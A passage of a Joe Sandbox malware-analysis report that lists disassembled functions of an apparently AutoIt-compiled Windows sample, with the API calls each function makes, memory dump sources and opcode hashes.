                            • Instruction ID: 550f10e5e9eb5535bd69432928227ea5c51c0d2543e115e6a110a02cff152fe9
                            • Opcode Fuzzy Hash: 722f2494248309c939433bbc7b5071825a14b38f093ddba2a7b229d67e99a795
                            • Instruction Fuzzy Hash: C0310B71901249BFDB159BD5EC89AFEBBBCEF08300F10016AB552A3151DA709F899BA0
                            Function 000E8DD5 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 000E8DF4
                            • GetWindowLongW.USER32(00A1E1E0,000000F0), ref: 000E8E27
                            • GetWindowLongW.USER32(00A1E1E0,000000F0), ref: 000E8E5C
                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 000E8E8E
                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 000E8EB8
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 000E8EC9
                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000E8EE3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LongWindow$MessageSend
                            • String ID:
                            • API String ID: 2178440468-0
                            • Opcode ID: 0cb815a0c76e0568728ef550a2abfb079624b50ec73831416c512e1ff0f66203
                            • Instruction ID: 2ad4548d820e6b692aae867f3566f630aa32bbc4509c94280afd007445ec5b13
                            • Opcode Fuzzy Hash: 0cb815a0c76e0568728ef550a2abfb079624b50ec73831416c512e1ff0f66203
                            • Instruction Fuzzy Hash: 8D311435240251AFDB20CF9AEC84F5537E5FB4A714F1581A5F949AB6B2CFB2AC80DB40
                            Function 000C16F1 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C1734
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C175A
                            • SysAllocString.OLEAUT32(00000000), ref: 000C175D
                            • SysAllocString.OLEAUT32(?), ref: 000C177B
                            • SysFreeString.OLEAUT32(?), ref: 000C1784
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 000C17A9
                            • SysAllocString.OLEAUT32(?), ref: 000C17B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: 58644d41f8e5b2a1791f54d102b4d8ea5bb8fd388d46b300dffb730a98cbc27c
                            • Instruction ID: 5aacc672cdf80dd89df346dce5237a91cfd0ce0233d311dc256cde720a91208d
                            • Opcode Fuzzy Hash: 58644d41f8e5b2a1791f54d102b4d8ea5bb8fd388d46b300dffb730a98cbc27c
                            • Instruction Fuzzy Hash: 58215175604219AFDB109BA8DC88DFE77FCEB0A3607508229F955DB291DA70EC818760
                            Function 000C69F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                            • lstrcmpiW.KERNEL32(?,?), ref: 000C6A2B
                            • _wcscmp.LIBCMT ref: 000C6A49
                            • MoveFileW.KERNEL32(?,?), ref: 000C6A62
                              • Part of subcall function 000C6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 000C6DBA
                              • Part of subcall function 000C6D6D: GetLastError.KERNEL32 ref: 000C6DC5
                              • Part of subcall function 000C6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 000C6DD9
                            • _wcscat.LIBCMT ref: 000C6AA4
                            • SHFileOperationW.SHELL32(?), ref: 000C6B0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 2323102230-1173974218
                            • Opcode ID: f58ec78a166373b3fca9e0b76dc5090f99562a387f31560d6332e70b18b0db77
                            • Instruction ID: f2ff14da45eb750371e30691eb6aa2f921cdf0b5213aa3235ceebfec119d184b
                            • Opcode Fuzzy Hash: f58ec78a166373b3fca9e0b76dc5090f99562a387f31560d6332e70b18b0db77
                            • Instruction Fuzzy Hash: 14311371800219AACF60EFA4D845BDDB7B8AF08300F5445AAF509E3142EB759B89CF65
                            Function 000C2FCD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: c156cbfea09d0f820889d788fdd9e3dd3b034f4f5eeba353894848f4058298d7
                            • Instruction ID: ff652023a7dbda86fde6598e1d37cc855dbbdc7329fb97b3151ad7a690035710
                            • Opcode Fuzzy Hash: c156cbfea09d0f820889d788fdd9e3dd3b034f4f5eeba353894848f4058298d7
                            • Instruction Fuzzy Hash: 7721263225462576D235A7749D12FFF73E89F5A300F20843EF98587183EB91AA83D391
                            Function 000C17C8 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C180D
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000C1833
                            • SysAllocString.OLEAUT32(00000000), ref: 000C1836
                            • SysAllocString.OLEAUT32 ref: 000C1857
                            • SysFreeString.OLEAUT32 ref: 000C1860
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 000C187A
                            • SysAllocString.OLEAUT32(?), ref: 000C1888
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: efff1f5b9fa08cae2a30bc4701f1b66ba66d66229c165125717ce3aa0ee34cf4
                            • Instruction ID: 5dd4c5b49a9b8ebebf2ad0dd35fb950510e4a6b050a75c143e0a2067192e4140
                            • Opcode Fuzzy Hash: efff1f5b9fa08cae2a30bc4701f1b66ba66d66229c165125717ce3aa0ee34cf4
                            • Instruction Fuzzy Hash: 6E215675604204AFDB109BF8DC89DFE77ECEF0A360B408129F955DB6A1DA70EC858B64
                            Function 000EA0D6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 000EA13B
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 000EA148
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 000EA153
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 000EA162
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 000EA16E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: 16a8f22911ee6e0af3e28ea865f85bfa639072c7980279132e84c11226bc2b93
                            • Instruction ID: f105c347c849dfd5223871284e7c19c969efb0672b4579ea8c0f8b18c48bd931
                            • Opcode Fuzzy Hash: 16a8f22911ee6e0af3e28ea865f85bfa639072c7980279132e84c11226bc2b93
                            • Instruction Fuzzy Hash: 0511B6B124021DBEEF154F61CC85EE77F5DEF0D798F014115F604A6090C676AC61DBA0
                            Function 0009C697 Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                            Download Yara Rule
                            APIs
                            • GetClientRect.USER32(?,?), ref: 0009C6C0
                            • GetWindowRect.USER32(?,?), ref: 0009C701
                            • ScreenToClient.USER32(?,?), ref: 0009C729
                            • GetClientRect.USER32(?,?), ref: 0009C856
                            • GetWindowRect.USER32(?,?), ref: 0009C86F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Rect$Client$Window$Screen
                            • String ID:
                            • API String ID: 1296646539-0
                            • Opcode ID: 08b795551cce7c9c15211c1567327d2e6f8c03bca117277a5c68f3513c0babcc
                            • Instruction ID: 758518af869c91b0fcab97f12329ff653b86baf66ce1eebe5de05164e806fbd7
                            • Opcode Fuzzy Hash: 08b795551cce7c9c15211c1567327d2e6f8c03bca117277a5c68f3513c0babcc
                            • Instruction Fuzzy Hash: E2B13A79900249DBEF50CFA8C580BEEB7B1FF08310F149169ED59EB655DB30A940EB64
                            Function 000C9569 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$__itow__swprintf
                            • String ID:
                            • API String ID: 3253778849-0
                            • Opcode ID: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                            • Instruction ID: e8f09cbf2f75d2b44279dab6d2a4d074705f62fd7a50e0715b788f92ba92eb05
                            • Opcode Fuzzy Hash: 393073a4f73e22837f2b85775877da757f7406cf2603c2931cb838de39875670
                            • Instruction Fuzzy Hash: DE61983150425AABDF05EF60CC86FFE37A9AF05304F048559F89AAB293EB34E905CB51
                            Function 000E1AD0 Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 000E1B09
                            • Process32FirstW.KERNEL32(00000000,?), ref: 000E1B17
                            • __wsplitpath.LIBCMT ref: 000E1B45
                              • Part of subcall function 000A297D: __wsplitpath_helper.LIBCMT ref: 000A29BD
                            • _wcscat.LIBCMT ref: 000E1B5A
                            • Process32NextW.KERNEL32(00000000,?), ref: 000E1BD0
                            • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 000E1BE2
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 1380811348-0
                            • Opcode ID: b8d4926b8df9415f9f08467531e28ccc2ccdb480a5851249762cf1937daf90d6
                            • Instruction ID: 6ae84bbf6e0870210d27130e31f07f8458754dabd00ccddb55103b32eaed45a9
                            • Opcode Fuzzy Hash: b8d4926b8df9415f9f08467531e28ccc2ccdb480a5851249762cf1937daf90d6
                            • Instruction Fuzzy Hash: 77516D71504341AFD710EF64D885EEBB7ECAF88754F10492EF58997252EB70EA04CBA2
                            Function 000E2EC7 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2FA0
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E2FE0
                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000E3003
                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000E302C
                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000E306F
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E307C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                            • String ID:
                            • API String ID: 4046560759-0
                            • Opcode ID: 1333780b0fef21edf5e951451a91526fb3325291e68c617dd0612d6cd8156812
                            • Instruction ID: fc044b199639a9f5bcb236a4cb359cebf3f64a25775e7bc4919a679ecb81c415
                            • Opcode Fuzzy Hash: 1333780b0fef21edf5e951451a91526fb3325291e68c617dd0612d6cd8156812
                            • Instruction Fuzzy Hash: B0515931108244AFC714EF64C895EAEBBF9FF88304F04492EF595972A2DB71EA05CB52
                            Function 0009DB8C Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                            • Instruction ID: 08ebe81ee1feb94769ceccc03a395135eb22c48772c2cee2e8f92c488fe0eaef
                            • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                            • Instruction Fuzzy Hash: D951E1B0944216AACF61AF98C4419FEB3F5EF05710F50804BF681AB292DBB45F42FB94
                            Function 000C2ADC Relevance: 9.2, APIs: 6, Instructions: 158COMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(?), ref: 000C2AF6
                            • VariantClear.OLEAUT32(00000013), ref: 000C2B68
                            • VariantClear.OLEAUT32(00000000), ref: 000C2BC3
                            • _memmove.LIBCMT ref: 000C2BED
                            • VariantClear.OLEAUT32(?), ref: 000C2C3A
                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000C2C68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$Clear$ChangeInitType_memmove
                            • String ID:
                            • API String ID: 1101466143-0
                            • Opcode ID: 55cedec745ed44a2ab4d350ed990befa527540cff24f13b609b486a02057dac9
                            • Instruction ID: b5f65d19afbfc8734d9124b2a0e13b07f24cee499091092d45efbcb761b80d4c
                            • Opcode Fuzzy Hash: 55cedec745ed44a2ab4d350ed990befa527540cff24f13b609b486a02057dac9
                            • Instruction Fuzzy Hash: 225133B5A00209AFDB24CF58D880EAEB7B8FF8C314B158559E959DB314E730E951CBA0
                            Function 000E82DB Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetMenu.USER32(?), ref: 000E833D
                            • GetMenuItemCount.USER32(00000000), ref: 000E8374
                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000E839C
                            • GetMenuItemID.USER32(?,?), ref: 000E840B
                            • GetSubMenu.USER32(?,?), ref: 000E8419
                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 000E846A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Item$CountMessagePostString
                            • String ID:
                            • API String ID: 650687236-0
                            • Opcode ID: 2a9bb52909ca0ed7a9a25ea3af0602f1efada9025e42499389dbff105dd1c294
                            • Instruction ID: 34976fb4a1a924e2d2bbed2ace1ca80256f521346a2d7afc0c73d35450c83ce3
                            • Opcode Fuzzy Hash: 2a9bb52909ca0ed7a9a25ea3af0602f1efada9025e42499389dbff105dd1c294
                            • Instruction Fuzzy Hash: 37518C71A00219EFCF11EFA5C941AEEB7F4EF48710F148469E955BB392DB70AE418B90
                            Function 000C54E0 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000C552E
                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000C5579
                            • IsMenu.USER32(00000000), ref: 000C5599
                            • CreatePopupMenu.USER32 ref: 000C55CD
                            • GetMenuItemCount.USER32(000000FF), ref: 000C562B
                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000C565C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                            • String ID:
                            • API String ID: 3311875123-0
                            • Opcode ID: 81d015d6e10b0a225105c1d5147facca8f2cb3e00cc44bbcdbc10b08f0610d80
                            • Instruction ID: a8f2db3e01d37df4888a09fbf84c97612b330633806281dec4a108349b4842a0
                            • Opcode Fuzzy Hash: 81d015d6e10b0a225105c1d5147facca8f2cb3e00cc44bbcdbc10b08f0610d80
                            • Instruction Fuzzy Hash: 3451D074600A09DFDF20CF68DC88FAEBBF5AF1935AF50421DE4459B291E3B0A984CB51
                            Function 0009B18C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0009B1C1
                            • GetWindowRect.USER32(?,?), ref: 0009B225
                            • ScreenToClient.USER32(?,?), ref: 0009B242
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0009B253
                            • EndPaint.USER32(?,?), ref: 0009B29D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                            • String ID:
                            • API String ID: 1827037458-0
                            • Opcode ID: 5871ebbe11cb9e1a2f725191cf4abb621556139387ef5ca0c9753767eb15ebf2
                            • Instruction ID: 203d664ca1fede7ce148efd1c8e83795f6d23ab87dff549d73267247d403ff40
                            • Opcode Fuzzy Hash: 5871ebbe11cb9e1a2f725191cf4abb621556139387ef5ca0c9753767eb15ebf2
                            • Instruction Fuzzy Hash: 8441D270104201AFCB10DF64ED84FBA7BE8EF46730F040669FA95872B2C7719885EB61
                            Function 000EE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(00141810,00000000,?,?,00141810,00141810,?,000FE2D6), ref: 000EE21B
                            • EnableWindow.USER32(00000000,00000000), ref: 000EE23F
                            • ShowWindow.USER32(00141810,00000000,?,?,00141810,00141810,?,000FE2D6), ref: 000EE29F
                            • ShowWindow.USER32(00000000,00000004,?,?,00141810,00141810,?,000FE2D6), ref: 000EE2B1
                            • EnableWindow.USER32(00000000,00000001), ref: 000EE2D5
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 000EE2F8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
